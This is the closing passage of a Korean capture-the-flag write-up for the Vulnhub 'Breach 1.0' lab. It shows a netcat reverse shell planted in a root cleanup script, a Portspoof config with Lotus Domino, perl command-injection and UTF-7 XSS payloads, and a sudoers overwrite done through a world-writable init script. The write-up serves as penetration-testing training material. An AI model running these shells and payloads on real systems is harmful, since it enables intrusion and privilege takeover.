nc -e /bin/bash 192.168.110.4 4444
blumbergh@Breach:~$ cat /usr/share/cleanup/tidyup.sh
cat /usr/share/cleanup/tidyup.sh
nc -e /bin/bash 192.168.110.4 4444
blumbergh@Breach:~$ 
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.110.4] from (UNKNOWN) [192.168.110.140] 45022
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
pwd
/root
ls -la
total 60
drwx------  4 root root  4096 Jun 12 09:37 .
drwxr-xr-x 22 root root  4096 Jun  4 09:56 ..
-rw-------  1 root root   115 Jun 12 09:42 .bash_history
-rw-r--r--  1 root root  3106 Feb 19  2014 .bashrc
drwx------  2 root root  4096 Jun  6 15:17 .cache
-rw-r--r--  1 root root   840 Jun 11 17:34 .flag.txt
-rw-r--r--  1 root root 23792 Jun  4 19:17 flair.jpg
-rw-r--r--  1 root root   140 Feb 19  2014 .profile
drwxr-xr-x  2 root root  4096 Jun  5 17:51 .rpmdb
-rw-r--r--  1 root root    66 Jun  4 19:48 .selected_editor
cat .flag.txt
-----------------------------------------------------------------------------------

______                     _     __   _____      _____ _          _____          _
| ___ \                   | |   /  | |  _  |    |_   _| |        |  ___|        | |
| |_/ /_ __ ___  __ _  ___| |__ `| | | |/' |______| | | |__   ___| |__ _ __   __| |
| ___ \ '__/ _ \/ _` |/ __| '_ \ | | |  /| |______| | | '_ \ / _ \  __| '_ \ / _` |
| |_/ / | |  __/ (_| | (__| | | || |_\ |_/ /      | | | | | |  __/ |__| | | | (_| |
\____/|_|  \___|\__,_|\___|_| |_\___(_)___/       \_/ |_| |_|\___\____/_| |_|\__,_|


-----------------------------------------------------------------------------------
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.

 

 

 

번외

blumbergh@Breach:/usr/local/etc$ cat portspoof.conf
cat portspoof.conf

# This is an example Portspoof configuration file
# 
#       :Examples:
#
# 1. SINGLE PORT
#
#       port "payload"
#
# 2. PORT RANGE
#
#       port_nr_start-port_nr_start "payload"
#
# 3. PAYLOAD: Hex Encoded (useful for exploits)
#
#       port "\x20\x20\x41\x41\x41 string payload"
#
# 4. PAYLOAD: Regular expressions
#
#       port "regular_expression [\w]+ ..."


#Example: Send custom payload (this can be a simple string)

1 "550 12345 0000000000000000000000000000000000000000000000000000000"
2 "550 12345 0000000000000000000000000000000000000000000000000000000"
3 "550 12345 0000000000000000000000000000000000000000000000000000000"
4 "550 12345 0000000000000000000000000000000000000000000000000000000"
5 "550 12345 0000000000000000000000000000000000000000000000000000000"
6 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
7 "550 12345 0fffffffffffff777778887777777777cffffffffffffffffffff00"
8 "550 12345 0fffffffffff8000000000000000008888887cfcfffffffffffff00"
9 "550 12345 0ffffffffff80000088808000000888800000008887ffffffffff00"
10 "550 12345 0fffffffff70000088800888800088888800008800007ffffffff00"
11 "550 12345 0fffffffff000088808880000000000000088800000008fffffff00"
12 "550 12345 0ffffffff80008808880000000880000008880088800008ffffff00"
13 "550 12345 0ffffffff000000888000000000800000080000008800007fffff00"
14 "550 12345 0fffffff8000000000008888000000000080000000000007fffff00"
15 "550 12345 0ffffff70000000008cffffffc0000000080000000000008fffff00"
16 "550 12345 0ffffff8000000008ffffff007f8000000007cf7c80000007ffff00"
17 "550 12345 0fffff7880000780f7cffff7800f8000008fffffff80808807fff00"
18 "550 12345 0fff78000878000077800887fc8f80007fffc7778800000880cff00"
19 "550 12345 0ff70008fc77f7000000f80008f8000007f0000000000000888ff00"
20 "550 12345 0ff0008f00008ffc787f70000000000008f000000087fff8088cf00"
21 "550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00"
22 "550 12345 0f8008c008fff8000000000000780000007f800087708000800ff00"
23 "550 12345 0f8008707ff07ff8000008088ff800000000f7000000f800808ff00"
24 "550 12345 0f7000f888f8007ff7800000770877800000cf780000ff00807ff00"
25 "550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00"
26 "550 12345 0ff70800008ff800f007fff70880000087f70000007fcf7007fff00"
27 "550 12345 0fff70000007fffcf700008ffc778000078000087ff87f700ffff00"
28 "550 12345 0ffffc000000f80fff700007787cfffc7787fffff0788f708ffff00"
29 "550 12345 0fffff7000008f00fffff78f800008f887ff880770778f708ffff00"
30 "550 12345 0ffffff8000007f0780cffff700000c000870008f07fff707ffff00"
31 "550 12345 0ffffcf7000000cfc00008fffff777f7777f777fffffff707ffff00"
32 "550 12345 0cccccff0000000ff000008c8cffffffffffffffffffff807ffff00"
33 "550 12345 0fffffff70000000ff8000c700087fffffffffffffffcf808ffff00"
34 "550 12345 0ffffffff800000007f708f000000c0888ff78f78f777c008ffff00"
35 "550 12345 0fffffffff800000008fff7000008f0000f808f0870cf7008ffff00"
36 "550 12345 0ffffffffff7088808008fff80008f0008c00770f78ff0008ffff00"
37 "550 12345 0fffffffffffc8088888008cffffff7887f87ffffff800000ffff00"
38 "550 12345 0fffffffffffff7088888800008777ccf77fc777800000000ffff00"
39 "550 12345 0fffffffffffffff800888880000000000000000000800800cfff00"
40 "550 12345 0fffffffffffffffff70008878800000000000008878008007fff00"
41 "550 12345 0fffffffffffffffffff700008888800000000088000080007fff00"
42 "550 12345 0fffffffffffffffffffffc800000000000000000088800007fff00"
43 "550 12345 0fffffffffffffffffffffff7800000000000008888000008ffff00"
44 "550 12345 0fffffffffffffffffffffffff7878000000000000000000cffff00"
45 "550 12345 0ffffffffffffffffffffffffffffffc880000000000008ffffff00"
46 "550 12345 0ffffffffffffffffffffffffffffffffff7788888887ffffffff00"
47 "550 12345 0ffffffffffffffffffffffffffffffffffffffffffffffffffff00"
48 "550 12345 0000000000000000000000000000000000000000000000000000000"
49 "550 12345 0000000000000000000000000000000000000000000000000000000"
50 "550 12345 0000000000000000000000000000000000000000000000000000000"

#Example: port range

51-60 "550 4m2v4 (FUZZ_HERE)"

#Example: Simple regular expression payloads

8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n"
8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n"
8082 "word: ... \. \d \w \n"

#Nmap regular expression matched payloads

8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n"
8101 "220 FUZZ_HERE SMTP ready to roll\r\n"
8102 "550 12345 FUZZ_HERE"
8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n"
8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\n<title>Log In - Juniper Web Device Manager</title><address>Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80</address>"

## EXPLOITS ##

# NMAP 
# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145  -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/'  -d4

80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--<html>\r\n--<body><a href=\x22user-UserID\x22>\r\n--<input name=\x22HTTPPassword\x22  value=\x22PPASSS\x22>\r\n--<input name=\x22FullName\x22 value=\x22\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2fusr\x2flocal\x2fshare\x2fnmap\x2fscripts\x2fhttp-domino-enum-passwords\x2ense\x00\x61\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x5c\x25\x64\x0d\x0a--\x22>\r\n\r\n--<a href=\x22\%?OpenDocumentddddd\x22>\r\n--<form action=\x22aaa?ReadForm&\x22>\r\n--</body>\r\n--</html>\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a"

#OS cmd injection payload for bash: $(cat output) and `cat output` injections
8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;"

#McAffe SuperScan UTF7 XSS payload
1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-"





blumbergh@Breach:/etc/init.d$ ls -al
ls -al
total 208
drwxr-xr-x   2 root root 4096 Jun  5  2016 .
drwxr-xr-x 110 root root 4096 Apr  6 07:29 ..
-rwxr-xr-x   1 root root 2243 Apr  3  2014 acpid
-rwxr-xr-x   1 root root 9974 Jan  7  2014 apache2
-rwxr-xr-x   1 root root 4596 Apr 24  2015 apparmor
-rwxr-xr-x   1 root root 2801 Nov  9  2015 apport
-rwxrwxr-x   1 root root 1071 Sep  8  2013 atd
-rwxr-xr-x   1 root root 1919 Jan 18  2011 console-setup
lrwxrwxrwx   1 root root   21 May 20  2016 cron -> /lib/init/upstart-job
-rwxr-xr-x   1 root root 2813 Nov 25  2014 dbus
-rwxr-xr-x   1 root root 1217 Mar  7  2013 dns-clean
lrwxrwxrwx   1 root root   21 Mar 14  2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x   1 root root 1105 May 13  2015 grub-common
-rwxr-xr-x   1 root root 1329 Mar 12  2014 halt
-rwxr-xr-x   1 root root 1864 Nov 12  2012 irqbalance
-rwxr-xr-x   1 root root 1293 Mar 12  2014 killprocs
-rwxr-xr-x   1 root root 1990 Jan 22  2013 kmod
-rw-r--r--   1 root root    0 Feb 17  2016 .legacy-bootordering
-rwxr-xr-x   1 root root 5491 Feb 19  2014 mysql
-rwxr-xr-x   1 root root 4479 Mar 20  2014 networking
-rwxr-xr-x   1 root root 1581 Feb 16  2016 ondemand
-rwxrwxrwx   1 root root  231 Jun  5  2016 portly.sh
-rwxr-xr-x   1 root root  561 Apr 21  2015 pppd-dns
-rwxr-xr-x   1 root root 1192 May 27  2013 procps
-rwxr-xr-x   1 root root 6120 Mar 12  2014 rc
-rwxr-xr-x   1 root root  782 Mar 12  2014 rc.local
-rwxr-xr-x   1 root root  117 Mar 12  2014 rcS
-rw-r--r--   1 root root 2427 Mar 12  2014 README
-rwxr-xr-x   1 root root  639 Mar 12  2014 reboot
-rwxr-xr-x   1 root root 2918 Jun 13  2014 resolvconf
-rwxr-xr-x   1 root root 4395 Jan 20  2016 rsync
-rwxr-xr-x   1 root root 2913 Dec  4  2013 rsyslog
-rwxr-xr-x   1 root root 1226 Jul 22  2013 screen-cleanup
-rwxr-xr-x   1 root root 3920 Mar 12  2014 sendsigs
-rwxr-xr-x   1 root root  590 Mar 12  2014 single
-rw-r--r--   1 root root 4290 Mar 12  2014 skeleton
-rwxr-xr-x   1 root root  731 Feb  4  2014 sudo
-rwxr-xr-x   1 root root 7929 Feb 16  2014 tomcat6
-rwxr-xr-x   1 root root 6173 Apr 13  2014 udev
-rwxr-xr-x   1 root root 2721 Mar 12  2014 umountfs
-rwxr-xr-x   1 root root 2260 Mar 12  2014 umountnfs.sh
-rwxr-xr-x   1 root root 1872 Mar 12  2014 umountroot
-rwxr-xr-x   1 root root 1361 Dec  6  2013 unattended-upgrades
-rwxr-xr-x   1 root root 3111 Mar 12  2014 urandom
-rwxr-xr-x   1 root root 2666 Oct  8  2014 x11-common
milton@Breach:/etc/init.d$ echo "echo 'milton ALL=(ALL)ALL' > /etc/sudoers" > /etc/init.d/portly.sh
tc/init.d/portly.shALL=(ALL)ALL' > /etc/sudoers" > /e 


재부팅 후 milton으로 전환시 루트

728x90

'OSCP > Vulnahub' 카테고리의 다른 글

20. NullByte  (0) 2021.04.07
19. Breach 2  (0) 2021.04.07
17. Tommy boy  (0) 2021.04.03
16. RickdiculouslyEasy  (0) 2021.04.01
15. DerpNStink  (0) 2021.04.01

+ Recent posts